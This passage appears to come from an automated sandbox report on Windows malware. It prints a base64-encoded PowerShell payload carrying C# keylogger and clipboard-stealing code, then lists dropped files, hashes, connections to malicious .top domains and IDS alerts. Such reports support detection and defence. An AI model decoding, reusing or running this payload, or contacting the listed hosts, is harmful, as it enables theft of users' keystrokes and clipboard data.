kAOwBlAGwAcwBlACAAaQBmACAAKABnADQAMAAxAGQAMwBjAGIAOAApACAAYwBmADQAZgBkADAAZQA4ADMALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABjAGYANABmAGQAMABlADgAMwAuAEEAcABwAGUAbgBkACgAYwBmADEAOQA4AGIAYQA0ADYAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABqAGQANgAxAGIANQBhADMAMgAsACAAZQBiAGYANQBmADIAYgA0ADUALAAgAG0AMgBmADEANgA0ADgAYQAyACwAIABpAGEAYwBmADUANQA4ADUAZgApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB1AGkAbgB0ACAAYQAyAGUANQA4ADcAZAAwADUAKABJAG4AdABQAHQAcgAgAGEAZQAxADQAZgA4ADIANgAzACkAewBiAG8AbwBsACAAZwA4AGIAMwBjAGIAMABmADMAIAA9ACAAdAByAHUAZQA7AHMAdAByAGkAbgBnACAAZwAyADUAMgA4ADgAZgA4AGIAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAYgA5ADcAZgA4ADMAOQA2ADAAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AHcAaABpAGwAZQAgACgAZwA4AGIAMwBjAGIAMABmADMAKQB7AHMAdAByAGkAbgBnACAAZAAwADUANwBhADQAMwBmADEAIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAZwBhADEAZQBiADUAYgA4AGYALAAgAGEANQA2AGIAMAAwADAANwBkACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBpAGYAIAAoAGQAMAA1ADcAYQA0ADMAZgAxACAAIQA9ACAAIgAiACkAewBSAGUAZwBpAHMAdAByAHkASwBlAHkAIABmADQAZgBkADYAYQBkADkAYgAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBDAHUAcgByAGUAbgB0AFUAcwBlAHIALgBPAHAAZQBuAFMAdQBiAEsAZQB5ACgAYgA0ADIAYgA4ADQAZQAzADYALAAgAHQAcgB1AGUAKQA7AGkAZgAgACgAZgA0AGYAZAA2AGEAZAA5AGIAIAAhAD0AIABuAHUAbABsACkAewBmADQAZgBkADYAYQBkADkAYgAuAEQAZQBsAGUAdABlAFYAYQBsAHUAZQAoAGEANQA2AGIAMAAwADAANwBkACkAOwBmADQAZgBkADYAYQBkADkAYgAuAEMAbABvAHMAZQAoACkAOwB9AEUAeABpAHQAUAByAG8AYwBlAHMAcwAoADAAKQA7AH0AaQBmACAAKABDAGwAaQBwAGIAbwBhAHIAZAAuAEMAbwBuAHQAYQBpAG4AcwBUAGUAeAB0ACgAKQAgAD0APQAgAHQAcgB1AGUAKQB7AGcAMgA1ADIAOAA4AGYAOABiACAAPQAgAEMAbABpAHAAYgBvAGEAcgBkAC4ARwBlAHQAVABlAHgAdAAoACkAOwBpAGYAIAAoAGcAMgA1ADIAOAA4AGYAOABiACAAIQA9ACAAYgBhADcANgA5ADQANgBmADYAKQB7AHMAdAByAGkAbgBnACAAYQAyADgAZAA1ADgAMABhAGUAIAA9ACAAIgAiADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGIAZQA1ADMANgA0ADAAMAAyACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBsAGMANABmAGYAYgA1ADAAMgAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAZgAgACgAbABjADQAZgBmAGIANQAwADIAIAAhAD0AIAAwACkAewBpAG4AdAAgAG8ANQA5AGQAMwBhAGEANQA4ACAAPQAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQATABlAG4AZwB0AGgAKABsAGMANABmAGYAYgA1ADAAMgApADsAYgBlADUAMwA2ADQAMAAwADIALgBDAGEAcABhAGMAaQB0AHkAIAA9ACAAbwA1ADkAZAAzAGEAYQA1ADgAIAArACAAMQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABsAGMANABmAGYAYgA1ADAAMgAsACAAYgBlADUAMwA2ADQAMAAwADIALAAgAG8ANQA5AGQAMwBhAGEANQA4ACAAKwAgADEAKQA7AHUAaQBuAHQAIABfAHAAcgBvAGMAXwBpAGQAXwAgAD0AIAAwADsAaQBmACAAKABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAGwAYwA0AGYAZgBiADUAMAAyACwAIAByAGUAZgAgAF8AcAByAG8AYwBfAGkAZABfACkAIAAhAD0AIAAwACkAewBQAHIAbwBjAGUAcwBzACAAYQA4AGYAYQAxADMANwA3ADEAIAA9ACAAUAByAG8AYwBlAHMAcwAuAEcAZQB0AFAAcgBvAGMAZQBzAHMAQgB5AEkAZAAoACgAaQBuAHQAKQBfAHAAcgBvAGMAXwBpAGQAXwApADsAaQBmACAAKABhADgAZgBhADEAMwA3ADcAMQAgACEAPQAgAG4AdQBsAGwAKQAgAGEAMgA4AGQANQA4ADAAYQBlACAAPQAgAGEAOABmAGEAMQAzADcANwAxAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlADsAfQB9AGIAZQA1ADMANgA0ADAAMAAyAC4AQQBwAHAAZQBuAGQAKAAiACAAOgA6ACAAQwBsAGkAcABiAG8AYQByAGQAIgApADsAYgA5ADcAZgA4ADMAOQA2ADAALgBSAGUAbQBvAHYAZQAoADAALAAgAGIAOQA3AGYAOAAzADkANgAwAC4ATABlAG4AZwB0AGgAKQA7AGIAOQA3AGYAOAAzADkANgAwAC4AQQBwAHAAZQBuAGQAKABnADIANQAyADgAOABmADgAYgApADsAbAA1ADEAMAA4ADQAZQA0ADQAKABiAGUANQAzADYANAAwADAAMgAsACAAYQAyADgAZAA1ADgAMABhAGUALAAgAGIAOQA3AGYAOAAzADkANgAwACkAOwBiAGEANwA2ADkANAA2AGYANgAgAD0AIABnADIANQAyADgAOABmADgAYgA7AH0AfQBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQALgBTAGwAZQBlAHAAKAAxADAAMAAwACkAOwB9AHIAZQB0AHUAcgBuACAAMAA7AH0AWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGkAbgB0ACAAZQBjADgANAA5ADIAYQBjADMALAAgAGYANgBmAGUAYQA0AGQANgA2ACAAbABlAGQAOQA0ADYAYQBhAGYALAAgAEkAbgB0AFAAdAByACAAYQBlAGQAZAA0ADEAOQBkADkALAAgAHUAaQBuAHQAIABiADUAMwA4ADcAOABkADUAOAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgASQBuAHQAUAB0AHIAIABkAGMAZgA0ADYAZAA4ADIANgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABOAGUAeAB0AEgAbwBvAGsARQB4ACgASQBuAHQAUAB0AHIAIABkAGMAZgA0ADYAZAA4ADIANgAsACAAaQBuAHQAIABlAGIAZgA1AGYAMgBiADQANQAsACAASQBuAHQAUAB0AHIAIABtADIAZgAxADYANAA4AGEAMgAsACAASQBuAHQAUAB0AHIAIABpAGEAYwBmADUANQA4ADUAZgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AE0AbwBkAHUAbABlAEgAYQBuAGQAbABlACgAcwB0AHIAaQBuAGcAIABqAGIAYwA2ADgAZAA4ADIAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAaQBuAHQAIABvADkAMgA0ADcANwBjADEAMQAsACAAdQBpAG4AdAAgAGUAZAA4ADkAMABkAGQAYwBlACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAHUAaQBuAHQAIABiAGMAMwBmADAAYgA1AGUAZgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8AKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABUAG8AVQBuAGkAYwBvAGQAZQBFAHgAKABpAG4AdAAgAGoAMgA1ADYAZAAxADMAMQA3ACwAIAB1AGkAbgB0ACAAZgBlAGEANQA0ADcAOQBhADEALAAgAGIAeQB0AGUAWwBdACAAaABlAGQAYgA1ADUANwBkADgALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABkADgAMQA0AGMAZgA4ADAANQAsACAAaQBuAHQAIABwADgAZgBjADgAMQA0ADIAOAAsACAAdQBpAG4AdAAgAG4AMgBlAGUAMQBkAGYAZQAxACwAIAB1AGkAbgB0ACAAbgA3AGMAMAA1ADYANQA4AGEAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGIAeQB0AGUAWwBdACAAYwAwADMAMwAyADQAMQBmAGMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAdQBpAG4AdAAgAGoAMQA2AGUANQAxAGEAMwA2ACwAIAByAGUAZgAgAHUAaQBuAHQAIABmADUAYwA2AGMANABlADcAMwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAHUAaQBuAHQAIABpAGQANgAyADIAYgAzADkANgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAdQBpAG4AdAAgAGkAZAA2ADIAMgBiADMAOQA2ACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAaQBiAGUANAA2AGYANAA5AGEALAAgAGkAbgB0ACAAbQA0AGQANgAyAGMAMgAyADQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABqADEAMAA4ADYAZQAxAGQAMgAsACAAdQBpAG4AdAAgAGIAYgA2ADUAZAAzADYAOAAzACwAIABmADEAZABhADUAMgAxADkAMwAgAGwAOABiADgAZgA0ADgAZQA2ACwAIABJAG4AdABQAHQAcgAgAGoAZgA2ADAAYwAyADcAOAA5ACwAIAB1AGkAbgB0ACAAbgA5ADIAMgBhADYAMgAxADIALAAgAEkAbgB0AFAAdAByACAAZwA3ADQAYwAxADMAMwBhADEAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAbABvAG4AZwAgAEcAZQB0AFYAbwBsAHUAbQBlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAoAHMAdAByAGkAbgBnACAAagA0ADUAYwA4ADcAYQAwAGYALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABvAGUAMwBmAGQAYQAwADQAYgAsACAAVQBJAG4AdAAzADIAIABmADUAZABjAGUAYwAxADAANgAsACAAcgBlAGYAIABpAG4AdAAgAGcANABkAGMAZQA4ADAAMQBmACwAcgBlAGYAIABVAEkAbgB0ADMAMgAgAHAAZAA0ADAAZABiADgANAA5ACwAIAByAGUAZgAgAFUASQBuAHQAMwAyACAAZABhADIAOQBmADQANgBiAGMALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABrAGQAMwBhAGIAZQA4ADUAOQAsACAAVQBJAG4AdAAzADIAIABoADkAYQBjADMAYwAwADkAMQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB2AG8AaQBkACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAdQBpAG4AdAAgAGUAZQA1ADkAYgAxAGEAOQAxACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAgAG8AOAA3ADAAZQBkAGEANgA2ACwAIABiAG8AbwBsACAAaQBiAGEAYQAyAGEANwA4ADQALAAgAHMAdAByAGkAbgBnACAAawAwADgAYgBkADUANwA0ADIAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE8AcABlAG4ATQB1AHQAZQB4ACgAdQBpAG4AdAAgAGQAZABhADAAOABiADUAOQBiACwAIABiAG8AbwBsACAAYwAwADAAMwAyADkAYQBmADkALAAgAHMAdAByAGkAbgBnACAAawAwADgAYgBkADUANwA0ADIAKQA7AH0AfQANAAoAIgBAACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBbAGcAMQBlADMAMgBhAGEAYQA0AC4AYQA3ADYAMAA3ADYAMgAxADAAXQA6ADoAUgB1AG4AKAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBjAG8AbgBzAG8AbABlAF0AOgA6AEMAYQBwAHMATABvAGMAawAgAH0AIAApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3804 | powershell.exe | C:\Users\admin\AppData\Local\Temp\0g2bwtd2.cmdline | text | |
MD5:— | SHA256:— | |||
| 1488 | csc.exe | C:\Users\admin\AppData\Local\Temp\0g2bwtd2.dll | executable | |
MD5:— | SHA256:— | |||
| 2780 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES3985.tmp | o | |
MD5:— | SHA256:— | |||
| 3412 | WScript.exe | C:\Users\admin\AppData\Local\Temp\58d7f2af | text | |
MD5:2CCC9637823753DE9CDCDF76A1D22725 | SHA256:BF5E1AEA0BB4BBADA5ECACB07A308565CAA6886684CA2D1D7EBABD09E5521AFE | |||
| 3804 | powershell.exe | C:\Users\admin\AppData\Local\Temp\vyghsbv0.zcy.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3412 | WScript.exe | C:\Users\admin\AppData\Local\Temp\63684d8c | text | |
MD5:3F95AA3599B1350188EBDA97C844DB0F | SHA256:4212DFBB6C23C98B3B7DC23D638ECAC038302DF165EE7D7133A258809A377038 | |||
| 3412 | WScript.exe | C:\Users\admin\AppData\Local\3b45c9b90.js | text | |
MD5:2CCC9637823753DE9CDCDF76A1D22725 | SHA256:BF5E1AEA0BB4BBADA5ECACB07A308565CAA6886684CA2D1D7EBABD09E5521AFE | |||
| 3412 | WScript.exe | C:\Users\admin\AppData\Local\Temp\?????????????? ???? 1840120-22.exe | gmc | |
MD5:A764BE7E63CA752584DAAA542A655D4B | SHA256:4F915C01F811C8E0B3DBC7411BD19368A9EE61380DEAC38614FF1FBB70BFA23A | |||
| 3412 | WScript.exe | C:\Users\admin\AppData\Local\Temp\5b160da1 | executable | |
MD5:D68180819BB8EB8207DC6AB74C1A4642 | SHA256:C2092159A11D0E36FF2E2B711F14AED732AA95BBBD673FD94150ADA32FE38254 | |||
| 1488 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCF2DCC0F2C3724F8B924F20541D8D92E.TMP | res | |
MD5:— | SHA256:— | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2768 | wscript.exe | 103.153.157.33:443 | 3a60dc39.top | — | — | unknown |
2768 | wscript.exe | 23.202.231.167:443 | 3a60dc39.fun | Akamai Technologies, Inc. | US | malicious |
2768 | wscript.exe | 199.21.76.81:443 | 4d67ecaf.top | Voxel Dot Net, Inc. | US | malicious |
Domain | IP | Reputation |
|---|---|---|
3a60dc39.top |
| malicious |
3a60dc39.fun |
| malicious |
3a60dc39.online |
| unknown |
3a60dc39.site |
| unknown |
4d67ecaf.top |
| malicious |
4d67ecaf.fun |
| unknown |
4d67ecaf.online |
| unknown |
4d67ecaf.site |
| unknown |
d303790c.top |
| malicious |
d303790c.fun |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2768 | wscript.exe | Potentially Bad Traffic | ET INFO Observed ZeroSSL Certificate for Suspicious TLD (.top) |
2768 | wscript.exe | Potentially Bad Traffic | ET INFO Observed ZeroSSL SSL/TLS Certificate |
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |